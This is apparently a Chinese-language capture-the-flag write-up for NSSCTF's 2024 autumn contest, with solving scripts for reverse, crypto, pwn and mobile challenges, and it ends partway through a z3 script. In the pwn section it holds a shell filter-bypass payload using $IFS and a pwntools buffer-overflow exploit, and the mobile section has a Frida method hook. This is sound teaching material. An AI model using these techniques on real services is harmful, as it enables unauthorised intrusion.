【NSSCTF】nssctf2024秋季招新赛赛
【NSSCTF】2024年NSSCTF秋季招新赛
Reverse
签到?
key加密
密文:
主加密程序
解密脚本:
a = [32,
39,
38,
37,
44,
45,
15,
34,
20,
30,
33,
24,
9,
223,
200,
28,
231,
5,
229,
226,
238,
26,
230,
4,
217,
201,
227,
10,
245,
241,
248,
243,
250,
234,
255,
231,
245,
185,
228,]
b = [104, 117, 117, 101, 114, 96, 0, 0]
flag = ''
for i in range(len(a)):
flag += chr(a[i] ^ ((b[i % 6] & 0xFF) ^ 6) + i)
print(flag)
又是签到!?
jadx打开mainacticity函数
怎么才能看见flag呢
打开就能看到
这也是py!?
复原字节码:
a = '~hojutfsfuoJ`pt`th^dcnbdsxAzESBRRM'
b = [0] * 59
if __name__ == "__main__":
print("PLZ input your flag: ")
c = input()
for i in range(17):
b[i] = ord(c[33 - i]) + 1
b[33 - i] = ord(c[i]) - 1
for i in range(34):
if b[i] != ord(a[i]):
print("Wrong!!!")
exit(0)
print("Great!!!")
解密脚本:
a = '~hojutfsfuoJ`pt`th^dcnbdsxAzESBRRM'
c = [0] * 34
flag = ''
for i in range(len(a)):
c[33 - i] = ord(a[i]) + 1
c[i] = ord(a[33 - i]) - 1
for i in c:
flag += chr(i)
print(flag)
NSS茶馆
加密函数在 sub_261118()中,是仅魔改了delta和round的tea加密
密文在 byte_27E010
以每两个四字节小端序为一组解密
解密脚本(我懒得再写一个for循环了,就一段一段复制进去分开解密三次:
#include <stdio.h>
#include <stdint.h>
void decrypt (uint32_t* v, uint32_t* k) {
uint32_t v0=v[0], v1=v[1], sum=1131796 * 33, i;
uint32_t delta=1131796;
uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];
for (i=0; i<33; i++) {
v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
sum -= delta;
}
v[0]=v0; v[1]=v1;
}
int main()
{
uint32_t v[2]={0x71B6BC57, 0xE0AC0DA2},k[4]={0x0B, 0x16, 0x21, 0x2C};
printf("origin:%u %u\n",v[0],v[1]);
decrypt(v, k);
printf("decryp:%x %x\n",v[0],v[1]);
return 0;
}
感谢云水泱泱学长整的never gonna give you up活,您的彩蛋我看了
md5也能爆破?
为什么我写出解密脚本能爆破第一组爆破不了第二组,出题人解答一下捏
原理就是出题人忘记修改每一轮md5加密的初始值了,我就是按照这个思路做的,为什么我不对呢
这是我的脚本
#include <stdint.h>
#include <string.h>
#include<stdio.h>
//举例用的待处理文件原始数据
//举例用的待处理文件原始数据
//四个32位链接变量的初始化值
//第二轮
uint32_t INIT_A = 3016669311;
uint32_t INIT_B = 2512869821;
uint32_t INIT_C = 1744182635;
uint32_t INIT_D = 1282025769;
uint32_t a,b,c,d = 0; //4轮逻辑计算中链接变量的过程量
uint32_t FileLen_Byte; //文件填充前的长度(单位 - 字节)
uint32_t FileLen_Bit[2]; //文件填充前的长度(单位 - 位 bit)
uint8_t MD5_ChangeBuff[64]; //临时缓存区 - 用于补位操作
uint32_t MD5_Buff[16]; //临时缓存区 - 用于每次运算装每组512 bit数据
uint8_t MD5_Data[16]; //最终计算结果 - 文件的MD5值
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))
#define RL(x, y) (((x) << (y)) | ((x) >> (32 - (y)))) //x向左循环移y位
#define FF(a, b, c, d, x, s, ac) a = b + (RL((a + F(b,c,d) + x + ac),s))
#define GG(a, b, c, d, x, s, ac) a = b + (RL((a + G(b,c,d) + x + ac),s))
#define HH(a, b, c, d, x, s, ac) a = b + (RL((a + H(b,c,d) + x + ac),s))
#define II(a, b, c, d, x, s, ac) a = b + (RL((a + I(b,c,d) + x + ac),s))
//MD5核心算法,4轮共64次计算
void MD5_Calculate(uint32_t* A, uint32_t* B, uint32_t* C, uint32_t* D) {
uint32_t a = *A, b = *B, c = *C, d = *D;
/* Round 1 */
FF (a, b, c, d, MD5_Buff[ 0], 7, 0xd76aa478); /**//* 1 */
FF (d, a, b, c, MD5_Buff[ 1], 12, 0xe8c7b756); /**//* 2 */
FF (c, d, a, b, MD5_Buff[ 2], 17, 0x242070db); /**//* 3 */
FF (b, c, d, a, MD5_Buff[ 3], 22, 0xc1bdceee); /**//* 4 */
FF (a, b, c, d, MD5_Buff[ 4], 7, 0xf57c0faf); /**//* 5 */
FF (d, a, b, c, MD5_Buff[ 5], 12, 0x4787c62a); /**//* 6 */
FF (c, d, a, b, MD5_Buff[ 6], 17, 0xa8304613); /**//* 7 */
FF (b, c, d, a, MD5_Buff[ 7], 22, 0xfd469501); /**//* 8 */
FF (a, b, c, d, MD5_Buff[ 8], 7, 0x698098d8); /**//* 9 */
FF (d, a, b, c, MD5_Buff[ 9], 12, 0x8b44f7af); /**//* 10 */
FF (c, d, a, b, MD5_Buff[10], 17, 0xffff5bb1); /**//* 11 */
FF (b, c, d, a, MD5_Buff[11], 22, 0x895cd7be); /**//* 12 */
FF (a, b, c, d, MD5_Buff[12], 7, 0x6b901122); /**//* 13 */
FF (d, a, b, c, MD5_Buff[13], 12, 0xfd987193); /**//* 14 */
FF (c, d, a, b, MD5_Buff[14], 17, 0xa679438e); /**//* 15 */
FF (b, c, d, a, MD5_Buff[15], 22, 0x49b40821); /**//* 16 */
/* Round 2 */
GG (a, b, c, d, MD5_Buff[ 1], 5, 0xf61e2562); /**//* 17 */
GG (d, a, b, c, MD5_Buff[ 6], 9, 0xc040b340); /**//* 18 */
GG (c, d, a, b, MD5_Buff[11], 14, 0x265e5a51); /**//* 19 */
GG (b, c, d, a, MD5_Buff[ 0], 20, 0xe9b6c7aa); /**//* 20 */
GG (a, b, c, d, MD5_Buff[ 5], 5, 0xd62f105d); /**//* 21 */
GG (d, a, b, c, MD5_Buff[10], 9, 0x02441453); /**//* 22 */
GG (c, d, a, b, MD5_Buff[15], 14, 0xd8a1e681); /**//* 23 */
GG (b, c, d, a, MD5_Buff[ 4], 20, 0xe7d3fbc8); /**//* 24 */
GG (a, b, c, d, MD5_Buff[ 9], 5, 0x21e1cde6); /**//* 25 */
GG (d, a, b, c, MD5_Buff[14], 9, 0xc33707d6); /**//* 26 */
GG (c, d, a, b, MD5_Buff[ 3], 14, 0xf4d50d87); /**//* 27 */
GG (b, c, d, a, MD5_Buff[ 8], 20, 0x455a14ed); /**//* 28 */
GG (a, b, c, d, MD5_Buff[13], 5, 0xa9e3e905); /**//* 29 */
GG (d, a, b, c, MD5_Buff[ 2], 9, 0xfcefa3f8); /**//* 30 */
GG (c, d, a, b, MD5_Buff[ 7], 14, 0x676f02d9); /**//* 31 */
GG (b, c, d, a, MD5_Buff[12], 20, 0x8d2a4c8a); /**//* 32 */
/* Round 3 */
HH (a, b, c, d, MD5_Buff[ 5], 4, 0xfffa3942); /**//* 33 */
HH (d, a, b, c, MD5_Buff[ 8], 11, 0x8771f681); /**//* 34 */
HH (c, d, a, b, MD5_Buff[11], 16, 0x6d9d6122); /**//* 35 */
HH (b, c, d, a, MD5_Buff[14], 23, 0xfde5380c); /**//* 36 */
HH (a, b, c, d, MD5_Buff[ 1], 4, 0xa4beea44); /**//* 37 */
HH (d, a, b, c, MD5_Buff[ 4], 11, 0x4bdecfa9); /**//* 38 */
HH (c, d, a, b, MD5_Buff[ 7], 16, 0xf6bb4b60); /**//* 39 */
HH (b, c, d, a, MD5_Buff[10], 23, 0xbebfbc70); /**//* 40 */
HH (a, b, c, d, MD5_Buff[13], 4, 0x289b7ec6); /**//* 41 */
HH (d, a, b, c, MD5_Buff[ 0], 11, 0xeaa127fa); /**//* 42 */
HH (c, d, a, b, MD5_Buff[ 3], 16, 0xd4ef3085); /**//* 43 */
HH (b, c, d, a, MD5_Buff[ 6], 23, 0x04881d05); /**//* 44 */
HH (a, b, c, d, MD5_Buff[ 9], 4, 0xd9d4d039); /**//* 45 */
HH (d, a, b, c, MD5_Buff[12], 11, 0xe6db99e5); /**//* 46 */
HH (c, d, a, b, MD5_Buff[15], 16, 0x1fa27cf8); /**//* 47 */
HH (b, c, d, a, MD5_Buff[ 2], 23, 0xc4ac5665); /**//* 48 */
/* Round 4 */
II (a, b, c, d, MD5_Buff[ 0], 6, 0xf4292244); /**//* 49 */
II (d, a, b, c, MD5_Buff[ 7], 10, 0x432aff97); /**//* 50 */
II (c, d, a, b, MD5_Buff[14], 15, 0xab9423a7); /**//* 51 */
II (b, c, d, a, MD5_Buff[ 5], 21, 0xfc93a039); /**//* 52 */
II (a, b, c, d, MD5_Buff[12], 6, 0x655b59c3); /**//* 53 */
II (d, a, b, c, MD5_Buff[ 3], 10, 0x8f0ccc92); /**//* 54 */
II (c, d, a, b, MD5_Buff[10], 15, 0xffeff47d); /**//* 55 */
II (b, c, d, a, MD5_Buff[ 1], 21, 0x85845dd1); /**//* 56 */
II (a, b, c, d, MD5_Buff[ 8], 6, 0x6fa87e4f); /**//* 57 */
II (d, a, b, c, MD5_Buff[15], 10, 0xfe2ce6e0); /**//* 58 */
II (c, d, a, b, MD5_Buff[ 6], 15, 0xa3014314); /**//* 59 */
II (b, c, d, a, MD5_Buff[13], 21, 0x4e0811a1); /**//* 60 */
II (a, b, c, d, MD5_Buff[ 4], 6, 0xf7537e82); /**//* 61 */
II (d, a, b, c, MD5_Buff[11], 10, 0xbd3af235); /**//* 62 */
II (c, d, a, b, MD5_Buff[ 2], 15, 0x2ad7d2bb); /**//* 63 */
II (b, c, d, a, MD5_Buff[ 9], 21, 0xeb86d391); /**//* 64 */
*A += a;
*B += b;
*C += c;
*D += d;
}
char* md5(uint8_t *FileBuff, size_t size)
{
uint8_t i = 0;
static char MD5_String[33]; // 静态字符串用于返回
uint32_t A = INIT_A, B = INIT_B, C = INIT_C, D = INIT_D;
memset(MD5_String, 0, sizeof(MD5_String));
//获取加密数据长度(单位 - 字节)
FileLen_Byte = size; //这里要注意减去字符串结束符'\0'占的一个字节长度
//分组循环运算直至文件结束(每组 512 bit 即 每组 64 字节)
for(i = 0; i < FileLen_Byte / 64; i++)
{
memset(MD5_Buff, 0, 64); //初始化 MD5_Buff 数组为0
memcpy(&MD5_Buff[0], &FileBuff[i * 64], 64); //高低位倒序赋值(大小端转换)
MD5_Calculate(&A, &B, &C, &D); //进行四轮逻辑计算
}
//最后一组不足512 bit,补位 “1” 和 “0”
memset(MD5_Buff, 0, 64); //初始化 MD5_Buff(数组大小16,数据类型长度4字节)
memset(MD5_ChangeBuff, 0, 64); //初始化 MD5_ChangeBuff(数组大小64,数据类型长度1字节)
memcpy(MD5_ChangeBuff, &FileBuff[FileLen_Byte - (FileLen_Byte % 64)], FileLen_Byte % 64);
MD5_ChangeBuff[FileLen_Byte % 64] = 128; //在文件末尾先补一个1和七个0,十进制128的二进制即1000 0000
memcpy(&MD5_Buff[0], &MD5_ChangeBuff[0], 64); //高低位倒序赋值(大小端转换)
//补完第一个字节,128的二进制即1000 0000后,判断这一组还有没有空位放 文件填充前的长度(64bit,即8个字节)
//若不够位置放,则再补一组512 bit,在那组的最后放文件填充前长度。
if((FileLen_Byte % 64) > 55) //64 - 1 - 8 = 55
{
MD5_Calculate(&A, &B, &C, &D); //进行四轮逻辑计算
memset(MD5_Buff, 0, 64); //初始化 MD5_Buff 数组为0
}
//在最后一个分组的最后补上原始文件填充前的长度(单位 - 位 bit)
FileLen_Bit[1] = (uint32_t)(FileLen_Byte >> 29); // 右移29位,获取高位
FileLen_Bit[0] = (uint32_t)(FileLen_Byte << 3); // 左移3位,转为位长度
memcpy(&MD5_Buff[14], FileLen_Bit, 8); //末尾加入原文件的bit长度(文件填充前的长度(单位 - bit))
MD5_Calculate(&A, &B, &C, &D);
memcpy(&MD5_Data[0], &A, 4); //高低位倒序赋值
memcpy(&MD5_Data[4], &B, 4); //高低位倒序赋值
memcpy(&MD5_Data[8], &C, 4); //高低位倒序赋值
memcpy(&MD5_Data[12], &D, 4); //高低位倒序赋值
// 打印出MD5值 - 想打印的时候就删掉注释
for (i = 0; i < 16; i++)
{
sprintf(&MD5_String[i * 2], "%02x", MD5_Data[i]); // 每个字节占用2个字符
}
// printf("MD5 : %s\n", MD5_String);
// printf("\nA = %u (0x%x)\n", A, A);
// printf("B = %u (0x%x)\n", B, B);
// printf("C = %u (0x%x)\n", C, C);
// printf("D = %u (0x%x)\n", D, D);
return MD5_String ;
}
int main() {
char dic[] = "1234567890";
char encrypt[] = "f182395ed4eaa34bf53fa0507e124c28";
for (int i = 0; i < strlen(dic); i++) {
for (int j = 0; j < strlen(dic); j++) {
for (int k = 0; k < strlen(dic); k++) {
for (int m = 0; m < strlen(dic); m++) {
uint8_t a = dic[i];
uint8_t b = dic[j];
uint8_t c = dic[k];
uint8_t d = dic[m];
uint8_t data[] = {a, b, c, d};
char *hash = md5(data, sizeof(data));
if (strcmp(hash, encrypt) == 0) {
printf("%c%c%c%c\n", dic[i], dic[j], dic[k], dic[m]);
printf("MD5: %s\n", hash);
}
}
}
}
}
return 0;
}
flower
影响程序执行的call retn花指令
先把这里的call改为jmp到下面那个函数
对着main_0按u后p重新分析函数
然后就可以对着上面的关键函数进行伪代码编译了
按x顺着函数点回去就行
a = [84 , 57 ,105 ,115, 95, 70, 49, 111, 119, 53, 114, 95,105,115,95,86,101,114,121,95,66,101,52,117,54,105,102,57,108,125]
b= ''
for i in a:
b += chr(i)
print(b)
好像也是py?
先把4.pyc修改文件头,把114514改成3.10版本的魔术头
然后用在线网站反编译pyc
解密脚本:
import base64
a = 'RGtAXV59UXtqTWVbUVd4aWs='
key = '114514'
def decrypt(text, key):
base64_decoded = base64.b64decode(text).decode()
subbed = ''.join((chr(ord(c) - 3) if c.isalpha() else c for c in base64_decoded))
swapped = subbed.swapcase()
return ''.join((chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(swapped)))
decrypted_text = decrypt(a, key)
print('Decrypted flag:', decrypted_text)
来做数学
直接点进fun()函数,修改变量名
猜测v1[0]是ord('N')
用z3求解
from z3 import *
x1, x2, x3, x4, x5, x6, x7, x8, x9, x10 = Ints('x1 x2 x3 x4 x5 x6 x7 x8 x9 x10')
x11, x12, x13, x14, x15, x16, x17, x18, x19, x20 = Ints('x11 x12 x13 x14 x15 x16 x17 x18 x19 x20')
v1_0 = 78
solver = Solver()
solver.add(x1 == 83)
solver.add(x4 + 32 * x3 + 43 * x2 + 81 * v1_0 + 35 * x5 == 14565)
solver.add(23 * x4 + 13 * x5 + 78 * x6 == 12436)
solver.add(19 * x15 + 10 * x14 + 17 * x13 + 15 * x12 + 12 * x10 + x9 / 4 + x7 + 32 * x6 + 23 * x8 + 10 * x16 == 12539)
solver.add(23 * x20 + 54 * x19 + 32 * x18 + 119 * x15 + 121 * x14 + 20 * x13 + 130 * x16 + 12 * x17 + 213 * x10 == 65168)
solver.add(1412 * x12 + 139 * x16 + 199 * x7 + 324 * x14 + 165 * x12 + 19 * x11 + 193 * x6 + 144 * x5 + 143 * x20 == 267159)
solver.add(867 * x13 + 654 * x11 + 678 * x9 + 175 * x7 + 45 * x5 + 21 * x1 + 13 * x3 + 100 * x15 + 24 * x17 == 244923)
solver.add(54 * x12 + 55 * x20 + 119 * x17 + 121 * x16 + 20 * x3 + 130 * x18 + 12 * x19 + 213 * x12 == 69874)
solver.add(x7 == 90)
solver.add(x20 == 125)
solver.add(233 * x10 + 134 * x2 + 378 * x4 + 133 * x9 + 178 * x6 + 443 * x5 + 11 * x1 + 543 * x11 == 188780)
solver.add(194 * x16 + 643 * x15 + 131 * x14 + 131 * x12 + 21 * x13 + 204 * x17 + 24 * x18 + 214 * x19 == 151642)
solver.add(123 * x18 + 25 * x16 + 124 * x13 + 37 * x14 + 7457 * x15 + 129 * x17 + 164 * x19 + 10 * x20 == 772291)
solver.add(132 * x16 + 807 * x15 + 756 * x14 + 163 * x13 + 633 * x12 + 423 * x11 + 42 * x10 + 534 * x17 == 346862)
solver.add(867 * x18 + 5956 * x13 + 204 * x12 + 374 * x10 + 47 * x9 + 485 * x15 + 37 * x16 + 375 * x20 == 740703)
solver.add(37 * x12 + 35 * x19 + 856 * x18 + 375 * x17 + 3578 * x16 + 567 * x3 + 55 * x20 + 21 * x4 == 436075)
solver.add(59 * x7 + 52 * x2 + 102 * x3 + 24 * x4 + 204 * x5 + 13 * x6 + 54 * x8 + 13 * x9 == 38344)
solver.add(98 * x7 + 85 * x6 + 13 * x4 + 19 * x3 + 12 * x1 + 166 * x2 + 25 * x5 + 23 * x8 == 39337)
solver.add(52 * v1_0 + 45 * x1 + 19 * x7 + 76 * x20 + 12 * x15 == 20141)
solver.add(56 * x1 + 34 * v1_0 + 75 * x7 + 80 * x20 + 16 * x15 + 19 * x12 == 27375)
solver.add(54 * x12 + 76 * x7 + 87 * x1 + 54 * v1_0 + 16 * x20 + 18 * x15 + 39 * x18 == 31598)
if solver.check() == sat:
model = solver.model()
result = ""
for var in [x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15, x16, x17, x18, x19, x20]:
if model.eval(var, model_completion=True) is not None:
result += chr(model[var].as_long())
print(result)
else:
print("no")
动态调试
题目说明是rc4,直接下断点开始动调
加密字符串v1长度为44
构造长度为44的字符串输入进去
修改input内存
运行到加密结束
不是,哥们,还有签到?
用c++写脚本,python数据处理不会溢出后取模
#include <iostream>
#include <cstdlib>
int main() {
unsigned char encrypted[] = {
0x63, 0x5E, 0x4C, 0x5A, 0x52, 0x15, 0x4A, 0x5A, 0x0D, 0x16,
0x15, 0x12, 0x76, 0x7F, 0x01, 0x33, 0x2D, 0x35, 0x17, 0x7F,
0x61, 0x0F, 0x21, 0x64, 0x3C, 0x31, 0x01, 0x40, 0x20, 0x5C,
0x59
};
int len = sizeof(encrypted) / sizeof(encrypted[0]);
srand(0x1BF52);
for (int i = 0; i < len; ++i) {
int rand_num = rand() % 100 + i;
char decrypted_char = encrypted[i] ^ rand_num;
std::cout << decrypted_char;
}
std::cout << std::endl;
return 0;
}
web
有一说一我直接开环境看js代码了,我以为是js逆向,。。。。。沟槽的看了三个小时,结果那俩js脚本根本不是拿来给你看的,,,,,,,,,,,(崩溃)
得把附件下下来,直接点开app.py,沟槽的加密文本直接展示出来了。。
打开环境把密文复制下来,然后写脚本即可
Pwn
nocat
代码块绕过
a=c;b=a;c=t;$a$b$c$IFS$1flag
兄弟你的环境好香?
shell地址:
变量内存
exp:
from pwn import *
r = remote('node6.anna.nssctf.cn', 24859)
offset = 80 + 8
payload = b'A' * offset + p64(0x00000000004011E1 + 1)
r.sendline(payload)
r.interactive()
Crypto
泰坦陨落2
种子的获得是乘法逆元,第二个加密是异或运算
from sympy import mod_inverse
#[3771924608, 3319331295, 583630258, 2401321321, 611326900]
a = 1664525
c = 1013904223
m = 2**32
key = 3771924608
re = mod_inverse(a, m)
key = ((key - c) * re) % m
key_bytes = key.to_bytes((key.bit_length() + 7) // 8, 'big')
key_length = len(key_bytes)
result = bytearray()
Encrypted_Bytes = b"n2!&t'\t\x06A\x14\x01\x00\x00\x16\x17EA\x13\x17ET\t\x17EC\x0e\x1e\nR\x12R\x0cNA\x06\rEA\x16\x04R\n\x0f"
for i in range(len(Encrypted_Bytes)):
result.append(Encrypted_Bytes[i] ^ key_bytes[i % key_length])
print(result)
Aftermath
套脚本
from Crypto.Util.number import *
from gmpy2 import gmpy2
n = 80722936701364382749961243326484006977187702986017980842794443374132452156776306032868217795522046975068822236770836452911408536092460646410756678157902792329645719935468879960944028782788489463895870961967670931567205550383999951787250211085264314795753745003815839218062934564501884684565508432346164094171
e1 = 3
flag1 = 77027474990431732719325428265107176934045610651944725251406683442684093440239073195437770144166442593914418380343458827052860752131667771506129334676070396374008929588455988149871039697387983766750148969695215583137356681988572655848921827794639096404716760310059622671470680330144220097050812716421370445797
e2 = 7
flag2 = 13491956530007991248882899018888359080930858500993821006822695375714947537976202424265808646466853291165511243721829370428583392329886743499827454177786585477285598196204906977043127274613692623229137936467994670727274820568522666762615055848367486507714640497446688083840123758417442971555904294548595887600
def rsa_gong_N_def(e1, e2, c1, c2, n):
e1, e2, c1, c2, n = int(e1), int(e2), int(c1), int(c2), int(n)
s = gmpy2.gcdext(e1, e2)
t = s[1]
z = s[2]
if t < 0:
t = - t
c1 = gmpy2.invert(c1, n)
elif z < 0:
z = -z
c2 = gmpy2.invert(c2, n)
m = (pow(c1, t, n) * pow(c2, z, n)) % n
return m
result = rsa_gong_N_def(e1, e2, flag1, flag2, n)
print(long_to_bytes(result))
看懂了就来拿flag吧
flag直接摆出来了
脚本跑不出来了吧
网络检索关键词 RSA 共模攻击 公钥相乘,找到参考文献
参考文献:[SWPUCTF 2021 新生赛]crypto(1~9)详细解题思路集外代软件安装,拓展安装,库函数安装_[swpuctf 2021 新生赛]crypto1-CSDN博客
n= 16282992590526808657350657123769110323293742472515808696156540766049532922340638986423163288656942484229334024198335416611687418341772216996129634991032127943095069143600315325916614910606100091970611448259491799589221889445348698100959509165262891180065554743420149168801638644589921791426690475846945077068114953844817073866258377206796158690941199907230130273657375727245023893672164113928189304228859412794067127721813637080447782673535996272223836127807775157150041664783263093604946744032762535394974814371771505843653571711445892969781888188805943142126747365056482511805191315474848971218180999336497135314654469910566730389765499603897685968204361422568601724914800686608628299192714352963744010136960423806304763245890692476493455775025753944860040020178234660999290356849442926396627701588938894161779071628447041006556793933320976506046066961014953196791133933438500843139378274786265308568167479880984705152809744111382599071097574636570516674122980589207824718402382459624138317432883921371298272851693734695823787102433937406420318428888224246291987404818042038201886113203158444083427668636941
c1= 15508846802476602732219982269293312372397631462289816533805702700260237855119470146237752798828431803179124957728439730580289236458563016332461725094295883030444173189424666004498359269921250956676320570006883951982237098373954348825003467019876101438948387668628518937831820206221522881150831840296199498447304138839838135264071071817072965792514115711621435317078108239744829134467948386247696344881838815422262901903767893118533887779588425725845820071451782420200868341564360095012698956683395031351656817392008005928265838760875070634021907630535014959579709368637536268853337028760833769278841040734409299575870823873616769863828516877971432999417800417684146077045836940988096634144368727546539602310924702126212020003620219218637652874119299016382481718659448722433296761241365473608283436835986184098161365747699791248301452334044327014782249692551362625130537300221641910570569803981153117200694806974917501061411963827755822672178568783269357196133308719688843211664095412087717861154226475203597889635926903753481174280305996204091501578865951177135086807765873529089048911740160698421289371229606
c2= 7038544062804420883340530319534054090343999593726615071597649914714397773106261660516938820194721330117082799104642674913839235601210294807255855747823709326405317366422536981850436536877639492293904186333547681934006229055311359852552059601531864585759120757265084674695094298158389804437120173997679271166467086009884419942249925895393890707373985126949313101489352481737754459985522998334847972008827503987883850638250024631354158979424169551575287515128697843093987592614974905262077415255065744686115142126350167970451060399517705823298929164793769442986603707135790651560436497661713972277808036463771768932747376668116480068277125579165831615220097562066809632099809702980365194257899499384219864311379004681733844738981954144617140038448109869114888325128710654235506628539192955240723379334422880368605005772426413018696218105733457019400100498450734710865067764542737004071080719589912326985050985424145053072697267879019954400205613591419766583673115931337146967400159040252514654983240188915104134405655336152730443436887872604467679522955837013574944135975481174502094839012368918547420588186051
e1e2= 59653
import libnum
import gmpy2
def rsa_gong_N_def(e1,e2,c1,c2,n): #共模攻击函数
e1, e2, c1, c2, n=int(e1),int(e2),int(c1),int(c2),int(n)
print("e1,e2:",e1,e2)
s = gmpy2.gcdext(e1, e2)
print("mpz:",s)
s1 = s[1]
s2 = s[2]
if s1 < 0:
s1 = - s1
c1 = gmpy2.invert(c1, n)
elif s2 < 0:
s2 = - s2
c2 = gmpy2.invert(c2, n)
m = (pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n
return int(m)
def de(c, e, n): #因为此时的m不是真正的m,而是m^k,所以对m^k进行爆破
k = 0
while k<1000: #指定k小于1000
mk = c + n*k
flag, true1 = gmpy2.iroot(mk, e) #返回的第一个数值为开方数,第二个数值为布尔型,可整除为true,可自行测试
if True == true1:
# print(libnum.n2s(int(flag)))
return flag
k += 1
for e1 in range(2,e1e2):
if e1e2%e1==0: #爆破可整除的e
e2=e1e2//e1
c=rsa_gong_N_def(e1, e2, c1, c2, n)
e=gmpy2.gcd(e1,e2)
m1=de(c, e, n)
if m1: #指定输出m1
print(libnum.n2s(int(m1)))
完全感觉Dreamer
cyber chief 解密
Take what you want
键盘字母绘图加密
Bury the Light
解密脚本:
from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes
from Crypto.Util.Padding import unpad
key_int = 268498734989386806140712175125788827088
key_bytes = long_to_bytes(key_int)
encrypted_data = b'g\xf6\xc8\x1d\x1ap\xb9\xefd\xcc\xf0t\xe8/O\x7f\x89\xa3l \x8bR[\x91\xddd\x11\x98tA\x12\xcc\xa5Jl\x08\xd7\x87\xa2M\x1c\xe46rm\x16\x9b('
cipher = AES.new(key_bytes, AES.MODE_ECB)
try:
decrypted_data = unpad(cipher.decrypt(encrypted_data), 16)
print("Decrypted flag:", decrypted_data.decode())
except ValueError as e:
print("Error in decryption or padding:", str(e))
Mobile
TryUrFrida
获取包名
aapt dump badging TryUrFrida.apk
launchable-activity: name='com.example.mobile5.MainActivity' label='' icon=''
com.example.mobile5.MainActivity
com.example.mobile5
这个便是我们要的
运行frida server
adb.exe connect 127.0.0.1:16384
adb shell
su
cd /data/local/tmp
chmod 777 frida-server-16.5.6-android-x86_64
./frida-server-16.5.6-android-x86_64
jadx分析源程序
这里是主加密程序,很简单的一个异或,我们可以想办法得到key,也就是hook getKey()函数,让它把key输出
编写hook程序
Java.perform(function() { //初始化java环境
var MainActivity = Java.use("com.example.mobile5.MainActivity"); // 找到 MainActivity 类
MainActivity.getKey.implementation = function() { // Hook getKey() 方法,implementation就是用来hook的
var key = this.getKey(); // 调用原始的 getKey() 方法以获取实际的返回值
console.log("[*] getKey() returned: ", key); // 直接打印原始密钥
return key; // 返回原始密钥
}
});
启动frida
frida -U -f com.example.mobile5 -l test.js
在应用界面输入一个符合长度的flag,然后confirm就可以输出key了
解密
貌似也可以hook check()函数,但返回值只是一个true,并没有说返回flag,所以直接hook getkey()返回key就行
hidden
flag_1和flag_2直接全局搜索找到
flag_3看到有drawable方法,上网搜,了解了apk的原理是文件的打包,改apk后缀为zip后即可在drawable文件下找到flag_3图片
NSSCTF{f0eaf15f-7eab-4b1c-b65b-75c043f77ff9}
SolveEEEEEEEEEEEEEEEE
SM4加密
这里是e,也就是key的加密,用z3约束求解
from z3 import *
solver = Solver()
e = [Int(f'e[{i}]') for i in range(16)]
for i in range(16):
solver.add(e[i] >= 32, e[i] <= 126)
solver.add(-e[0] * 40121 + e[1] * 88747 + e[2] * 55419 - e[3] * 60207 - e[4] * 95655 - e[5] * 67998 - e[6] * 71501 + e[7] * 27064 - e[8] * 92288 + e[9] * 49014 + e[10] * 48742 + e[11] * 59486 + e[12] * 67057 + e[13] * 44330 - e[14] * 18877 + e[15] * 54300 == 13674754)
solver.add(e[0] * 20764 - e[1] * 56132 + e[2] * 42361 - e[3] * 47999 + e[4] * 18926 + e[5] * 25960 + e[6] * 41000 - e[7] * 83148 - e[8] * 81635 - e[9] * 32392 + e[10] * 37496 - e[11] * 36577 + e[12] * 55541 - e[13] * 66888 + e[14] * 52446 - e[15] * 47572 == -5760864)
solver.add(-e[0] * 14605 + e[1] * 47959 - e[2] * 54165 + e[3] * 33315 + e[4] * 86734 + e[5] * 27524 + e[6] * 12166 + e[7] * 78395 - e[8] * 63947 - e[9] * 83458 - e[10] * 94907 + e[11] * 22419 + e[12] * 67604 + e[13] * 70447 - e[14] * 19622 + e[15] * 59656 == 12441718)
solver.add(e[0] * 86310 + e[1] * 21353 + e[2] * 46828 + e[3] * 38303 - e[4] * 32129 + e[5] * 54291 - e[6] * 61675 + e[7] * 19828 + e[8] * 10954 - e[9] * 54374 - e[10] * 21653 - e[11] * 83445 - e[12] * 15664 + e[13] * 19714 + e[14] * 40625 - e[15] * 16154 == -1660207)
solver.add(-e[0] * 87252 + e[1] * 38546 - e[2] * 32173 - e[3] * 45440 - e[4] * 33557 + e[5] * 41302 - e[6] * 68980 + e[7] * 79887 - e[8] * 34309 - e[9] * 62055 + e[10] * 85301 - e[11] * 12160 + e[12] * 64158 + e[13] * 17253 + e[14] * 96113 + e[15] * 49936 == 17554556)
solver.add(-e[0] * 10461 - e[1] * 13332 - e[2] * 83172 - e[3] * 89839 + e[4] * 49177 - e[5] * 67027 + e[6] * 52836 - e[7] * 32351 - e[8] * 36506 - e[9] * 85716 - e[10] * 18248 - e[11] * 71756 + e[12] * 11550 + e[13] * 10401 + e[14] * 58224 + e[15] * 62004 == -20383242)
solver.add(e[0] * 62959 - e[1] * 87830 - e[2] * 28501 + e[3] * 72711 - e[4] * 68592 + e[5] * 85823 - e[6] * 12043 - e[7] * 59333 - e[8] * 97667 + e[9] * 13926 + e[10] * 42558 - e[11] * 53575 + e[12] * 35475 - e[13] * 56414 - e[14] * 54865 - e[15] * 87249 == -21048644)
solver.add(e[0] * 44250 - e[1] * 55795 - e[2] * 17322 - e[3] * 65328 + e[4] * 91117 + e[5] * 23599 - e[6] * 95326 - e[7] * 26138 + e[8] * 77040 + e[9] * 14484 + e[10] * 11081 + e[11] * 72720 - e[12] * 35901 - e[13] * 46271 + e[14] * 75508 + e[15] * 34175 == 9002229)
solver.add(-e[0] * 39329 + e[1] * 54794 + e[2] * 47607 - e[3] * 61681 + e[4] * 68093 - e[5] * 51165 + e[6] * 54144 - e[7] * 33982 + e[8] * 69011 + e[9] * 79756 + e[10] * 83202 - e[11] * 43088 + e[12] * 89025 - e[13] * 47457 + e[14] * 24331 + e[15] * 39074 == 27513655)
